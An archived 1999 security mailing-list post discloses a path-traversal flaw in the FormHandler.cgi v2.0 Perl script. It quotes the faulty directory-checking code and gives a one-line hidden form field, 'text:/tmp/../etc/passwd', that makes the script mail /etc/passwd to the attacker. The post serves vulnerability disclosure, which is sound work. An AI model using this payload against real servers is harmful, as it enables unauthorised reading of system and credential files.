On Fri, 12 Nov 1999, Mnemonix wrote: > A quick search of the databases didn't show anything about this particular problem though the principle is well recognised as an issue: > > FormHandler.cgi available from http://www.cgi-perl.com/programs/FormHandler > uses hard coded physical paths for templates etc so it's possible to get sensitive files like /etc/passwd by modifying a site's form and submitting it. > > Cheers, > David Litchfield > http://www.infowar.co.uk/mnemonix/ > Cerberus Information Security > +44(0)181 661 7405 > Yeah, Matt's scripts security is a legend ;) Concrete example (formhandler.cgi v2.0) - you can download ANY file which user nobody has read perms to by attaching it to reply mail. Piece'o'code: @ALLOWED_ATTACH_DIRS = ('all'); # hmm, nice defaults ;) @RESTRICTED_ATTACH_DIRS = ('/etc/'); [...] if (&valid_directory($filename)) { # let's check if file is allowed push(@files, $filename); [...] } # to send [...] sub valid_directory { local ($filename) = $_[0]; local ($allowed_path, $restricted_path); local($valid_dir) = 0; if ($ALLOWED_ATTACH_DIRS[0] =~ /^all$/i) { $valid_dir = 1 } else { foreach $allowed_path (@ALLOWED_ATTACH_DIRS) { $valid_dir = ($filename =~ /^$allowed_path/); # silly ... last if $valid_dir; } } foreach $restricted_path (@RESTRICTED_ATTACH_DIRS) { $valid_dir = ($filename !~ /^$restricted_path/); # once more last if !$valid_dir; } return $valid_dir; } [...] How to d/l /etc/passwd ? Just add this to the form: <INPUT TYPE="hidden" NAME="reply_message_attach" VALUE="text:/tmp/../etc/passwd"> ... and voila, now wait for /etc/passwd to come to your mailbox. You can do exactly the same if @ALLOWED_ATTACH_DIRS is not set to "all". Trivial, isn't it ? It's just a one little sample of Matt's code. I think that we all have seen enough examples of his creativity. This topic can become a never-ending-story . Aleph, what do you think about killing every thread with "Matt" and "CGI" keywords in topic ? ;)) greetz, ____________________________________________________________ m4rcyS email: marcysat_private, mat_private "I think there is a world market for maybe five computers." - Thomas Watson, chairman of IBM, 1943 ------------------------------------------------------------
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:12:54 PDT